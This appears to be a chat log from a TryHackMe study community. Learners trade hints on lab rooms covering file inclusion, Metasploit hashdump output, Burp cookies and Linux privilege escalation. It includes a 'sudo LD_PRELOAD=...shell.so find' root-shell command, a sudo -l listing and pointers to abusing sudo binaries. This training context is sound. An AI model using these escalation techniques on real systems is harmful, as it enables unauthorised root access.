can anyone help with file inclusion task 4? im stuck on the first question

yeah

show it here

lol! coz that's what heroes do

I wish i could help! But i'm no more a subscriber

what should i write in answer if no os is detected in Nmap Post Port Scans?

LFI is fun

RFI is cool

I did that too

404

Hey guys i am on Metasploitexploitation room.

I am currently on task 5

What is the NTLM hash of the password of the user "pirate"?

I have the hashdump of the password but not sure how to get the NTLM hash.
Done some digging but nothing so far

Someone point me in the right direction 😄

404 error blah blah

this correct?

@steel nymph i done some digging but alot of info online is forwarding me onto tcp reverse exploit. But not sure that is correct

https://openwall.info/wiki/john/hash-formats this documents the format that meterpreter's hashdump command outputs

@idle bison cheers

More specifically, it's the pwdump format there.

That bit of documentation is annoyingly difficult to find sometimes

so how do I bring the cookie here

https://tryhackme.com/room/burpsuiteintruder

task11

You can also add it, it's the Cookie: stuffHere header

Find an authenticated request and copy the header

@idle bison Thanks i worked it out

Gave +1 Rep to @idle bison

A LOT of Windows tools will spit out pwdump format so it's worth knowing a little about

i am confused, LD_PRELOAD isn't there anywhere whne i type sudo -l, instead there is amail_badpass

should i set sudo mail_badpass=/home/user/ldpreload/shell.so find

instead of sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

Nope

LD_PRELOAD is specifically libraries, it needs to be that variable

sudo -l
Matching Defaults entries for karen on ip-10-10-23-155:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User karen may run the following commands on ip-10-10-23-155:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano

this is the output of sudo -l

i am in /tmp

If I remember correctly there is a link in the exercice to a https://gtfobins.github.io/ that shows how to exploit those binaries

ok

What can i use that will get me flag in File Inclusion challenge 3 I can't find the filter bypass 😢

Can anyone give me a hint for File Inclusion, Task 8, Challenge 3?
The one that filters the input.

Which task?

mix of challenge 1 and 2

Same for me... If I open the ticket I get the http request drom me but never from the staff...
edit: I've done it with the listener they provided and by putting http:// before their link

6

it's https://tryhackme.com/room/linprivesc task 6

Hey, you're a different person

I was just posting it in #room-bugs

yes, I have the same issue and I was stuck

env_keep is not available right?

On some systems, you may see the LD_PRELOAD environment option. Looks like it's telling you about it but doesn't expect you to do it?

correct, need to abuse one of the binaries from sudo -l

can i dm you

sure

@loud spire @tall siren I agree it's confusing, it'd be good for them to add a vulnerable config so you can practice as they do in the video.

so should i skip that task for now ?

No, not skip. You aren't meant to use ld_preload. You need to abuse the binaries that you have permissions to execute.

ok

Found the flag thanks to @steel nymph @modest arch @idle bison @north dove

Gave +1 Rep to @steel nymph

so sad only lassi got repo

I think i am making a mistake in XSS lab last task

can somebody help me with the gig?

yeah that is the issue 😅

Hey if someone wants to hack with me on the junior pentester path let me know